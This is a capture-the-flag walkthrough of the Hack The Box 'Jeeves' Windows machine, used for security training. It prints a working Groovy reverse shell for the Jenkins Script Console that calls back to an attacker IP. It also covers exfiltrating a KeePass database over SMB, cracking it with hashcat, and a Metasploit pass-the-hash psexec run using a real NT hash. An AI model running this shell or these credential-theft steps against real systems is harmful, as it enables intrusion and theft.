HTB – Jeeves

I really enjoyed the Jeeves box. I learned more on this box in the week I spent working on it than I have on multiple others, and it was my very first Windows CTF (which I was previously quite intimidated by, but I enjoyed the challenge immensely).

  • First, I run my usual nmap scan.
    nmap -T4 -A -v 10.10.10.63 reveals 4 open ports. Two of them are HTTP (80 and 50000). I take a look at both and enumerate each one separately.
  • Dirbuster/GoBuster on both open ports: gobuster with an exceptionally long wordlist was able to find the /askjeeves directory on port 50000. That's a start.
  • 10.10.10.63:50000/askjeeves gets you into some kind of backend console (a Jenkins instance).
  • I poked around a little and found the Script Console (Manage Jenkins > Script Console), which runs Apache Groovy on the Jenkins host with the privileges of the Jenkins service account. I did some searching on the language and the interface, and found a script developed by frohoff that spawns cmd.exe and wires it to a socket back to your listener (https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76). Groovy auto-imports java.io.* and java.net.*, so no import lines are needed; the only values to change are host and port:
    String host = "10.10.14.13";   // attacker IP (where the listener runs)
    int port = 8044;               // listener port
    String cmd = "cmd.exe";        // shell to spawn on the Jenkins host
    Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
    Socket s = new Socket(host, port);
    InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
    OutputStream po = p.getOutputStream(), so = s.getOutputStream();
    // Pump bytes between the process and the socket until the socket closes
    // or cmd.exe exits (exitValue() throws while the process is still running).
    while (!s.isClosed()) {
        while (pi.available() > 0) so.write(pi.read());
        while (pe.available() > 0) so.write(pe.read());
        while (si.available() > 0) po.write(si.read());
        so.flush();
        po.flush();
        Thread.sleep(50);
        try { p.exitValue(); break; } catch (Exception e) {}
    }
    p.destroy();
    s.close();
  • Started a netcat listener: nc -lvp 8044
    Executed the script in the console, got a shell.
    whoami: jeeves\kohsuke
    dir user.txt /s /p
    user.txt is on the Desktop.
    more user.txt to get the flag.

Now, we move on to root:

dir lists the files in the current directory, C:\Users\Administrator\.jenkins. Of interest are secret.key and secret.key.not-so-secret. If we more secret.key, we get a long hex string that looks like a hash. If we more secret.key.not-so-secret, we don't. Also in this directory is a subdirectory called "secrets", which contains multiple files of interest.

C:\Users\Administrator\.jenkins\secrets\:

InitialAdminPassword: ccd3bc435b3c4f80bea8acca28aec491

This actually gets you into the admin console on the web interface.

So, while I can't catch an interactive PowerShell session, I can execute PowerShell commands from this shell, and could potentially write a .ps1 script that I could execute to filter out common files and look for things that are unique. It's not perfect yet, and it's one I'm still working on now, but I'll post it eventually.

C:\Users\Administrator\.jenkins>powershell /?

powershell /?

C:\Users\Administrator\.jenkins>powershell -command "$a='hello';$a"
powershell -command "$a='hello';$a"
hello

Sweet. PowerShell works. I used PowerShell to check directories for nonstandard files. I basically created a list of common Windows file types to exclude, and had PowerShell run a search listing only the files not matching my "normal" set. In reality, that was far more complicated than it needed to be. It was in the user's Documents folder: a .kdbx file. I researched that extension and found out it was a KeePass database file, which could be very useful. I needed to get it from the Windows box back to my Kali box for further enumeration and cracking, though.
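The file-hunting script the post mentions is not on the page, so here is an added example of my own (not the author's script and not part of the original write-up) showing one way to do it in PowerShell. It lists known credential-store formats first, then everything whose extension is not on a "boring" list, grouped by extension so one-off types stand out. The root path, both extension lists and the AppData exclusion are assumptions to adjust.

```powershell
# Added example (not the author's script): find files under user profiles whose
# extension is unusual, and flag known credential/key-store formats outright.
# Root, extension lists and the AppData exclusion are assumptions to tune.
param(
    [string]$Root = 'C:\Users',
    [string[]]$Boring = @('.txt', '.lnk', '.ini', '.log', '.dll', '.exe', '.url',
                          '.dat', '.xml', '.json', '.ico', '.png', '.jpg', '.jpeg',
                          '.gif', '.tmp', '.db', '.pf', '.etl'),
    [string[]]$Interesting = @('.kdbx', '.kdb', '.ppk', '.pem', '.pfx', '.p12',
                               '.rdp', '.ovpn', '.psafe3', '.jks', '.keystore', '.config')
)

# -Force includes hidden files; AppData is skipped because it is mostly cache noise.
$files = Get-ChildItem -Path $Root -Recurse -File -Force -ErrorAction SilentlyContinue |
    Where-Object { $_.FullName -notmatch '\\AppData\\' }

# Group 1: known credential stores anywhere under the root (-contains is case-insensitive).
$hits = $files | Where-Object { $Interesting -contains $_.Extension }

# Group 2: anything with an extension that is neither "boring" nor already flagged.
$odd = $files | Where-Object {
    $ext = $_.Extension
    $ext -ne '' -and ($Boring -notcontains $ext) -and ($Interesting -notcontains $ext)
}

'== Known credential / key stores =='
$hits | Select-Object FullName, Length, LastWriteTime | Format-Table -AutoSize

'== Uncommon extensions (rarest first; one example path each) =='
$odd | Group-Object { $_.Extension.ToLower() } | Sort-Object Count |
    Select-Object Count, Name, @{ n = 'Example'; e = { $_.Group[0].FullName } } |
    Format-Table -AutoSize
```

From the cmd.exe shell, drop the script on the box (the SMB share described below works for that too) and run it with powershell -ExecutionPolicy Bypass -File hunt.ps1 -Root C:\Users; on Jeeves the .kdbx in kohsuke's Documents shows up in the first table.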

  • Set up a Samba share if you don't already have one for this purpose. The share path must exist, so create /root/files first (and consider renaming the stock smb.conf rather than deleting it, so you can restore the defaults).
    • apt-get install samba
    • cd /etc/samba
    • rm smb.conf
    • touch smb.conf
    • nano smb.conf
      • [files]
        path = /root/files
        browseable = yes
        read only = no
      • Ctrl+X, then y, then Enter
    • Add a Samba user (the account must also exist as a local user):
      smbpasswd -a root
      (will prompt for a password)
  • Start smbd and nmbd:
    service smbd start
    service nmbd start
  • robocopy the .kdbx file to the Samba share:
    Map the drive: net use z: \\10.10.14.13\files /user:root PASSWORD
    robocopy C:\users\kohsuke\documents z:\
    (This copies the whole Documents folder; add the file name as a third argument to copy just the .kdbx.)
  • Used keepass2john/John the Ripper to extract the hash. I found a great walkthrough on this here: www.rubydevices.com.au/blog/how-to-hack-keepass
  • Copy the .kdbx file into the folder containing keepass2john.
    Run: keepass2john CEH.kdbx > CEH.hash
    Edit the hash file and remove the "CEH:" prefix at the start of the line. keepass2john prepends the database file name as a user field for john, but hashcat's KeePass mode expects the line to begin with $keepass$.
  • Run: hashcat -m 13400 -a 0 -w 1 CEH.hash rockyou.txt
    (screenshot: hashcat output)
  • Great, I got a password. I use that to open the KeePass database, and I see a goldmine of credentials.
    (screenshot: KeePass database contents)
  • There are a lot of passwords in there. What stood out was the entry named "backup stuff", whose password field held a colon-separated pair of 32-character hex strings: the LM:NT hash format Windows stores for local accounts.
  • I went back and looked at what was open from my initial scans. SMB was open. I'm not nearly good enough to do this without Metasploit, but I knew I could pass the hash using an exploit module and get back a reverse TCP payload. The psexec module takes the LM:NT pair directly in SMBPass; the LM half here (aad3b435b51404eeaad3b435b51404ee) is the well-known "empty LM" placeholder, so it is the NT half that actually authenticates.
    msf > use exploit/windows/smb/psexec
    msf exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp
    msf exploit(windows/smb/psexec) > set rhost 10.10.10.63
    rhost => 10.10.10.63
    msf exploit(windows/smb/psexec) > set SMBUser administrator
    SMBUser => administrator
    msf exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
    SMBPass => aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
    msf exploit(windows/smb/psexec) > set lhost 10.10.14.13
    lhost => 10.10.14.13
    msf exploit(windows/smb/psexec) > exploit
  • Then, in meterpreter: getsystem
    shell
    cd C:\users\administrator\desktop
  • Huh... no root.txt... there's a text file here, though.
    more hm.txt yields: "The flag is elsewhere. Look deeper."
  • You've got to be kidding me... ugh. This box was testing my patience, as just about every time I thought I was done, I wasn't. After searching for ways to hide Windows files, and knowing it has to be on the Desktop per HTB rules (which I guess takes some of the fun out of looking), look for Alternate Data Streams: on NTFS a file can carry extra named streams that a plain dir never shows. This is a thing I'll keep in my back pocket on Windows boxes going forward as a "don't forget to enumerate for ADS files".
  • dir /r
    There it is, listed as hm.txt:root.txt:$DATA.
    more < hm.txt:root.txt prints the contents. (The input redirection is what makes this work; cmd's type will not open a named stream directly.)
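As an added example of mine (not part of the original write-up), the same ADS check in PowerShell: it walks a directory, lists every named stream other than the default :$DATA, marks Zone.Identifier (the mark-of-the-web stream on downloaded files) as the usual benign case, and reads the rest with Get-Content -Stream instead of the cmd.exe redirection trick. The default path is an assumption based on where the post found hm.txt.

```powershell
# Added example (not from the original write-up): enumerate alternate data
# streams under a directory and read every stream that is not the default
# data stream or the benign Zone.Identifier marker. Default path is assumed.
param(
    [string]$Path = 'C:\Users\Administrator\Desktop'
)

# Get-Item -Stream * returns one object per stream (FileName, Stream, Length);
# the primary data stream is always reported as ':$DATA', so drop it.
$streams = Get-ChildItem -Path $Path -Recurse -File -Force -ErrorAction SilentlyContinue |
    ForEach-Object { Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue } |
    Where-Object { $_.Stream -ne ':$DATA' }

'== Files with alternate data streams =='
$streams | Select-Object FileName, Stream, Length,
    @{ n = 'Note'; e = { if ($_.Stream -eq 'Zone.Identifier') { 'mark-of-the-web, usually benign' } else { 'inspect' } } } |
    Format-Table -AutoSize

# Dump the contents of every non-trivial stream (this is the hm.txt:root.txt case).
foreach ($s in ($streams | Where-Object { $_.Stream -ne 'Zone.Identifier' })) {
    "--- $($s.FileName):$($s.Stream) ---"
    Get-Content -LiteralPath $s.FileName -Stream $s.Stream
}
```

Run it from the psexec shell as powershell -ExecutionPolicy Bypass -File ads.ps1 -Path C:\Users\Administrator\Desktop; if you want the whole volume instead of one directory, pass -Path C:\ and expect a lot of Zone.Identifier noise in the first table.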
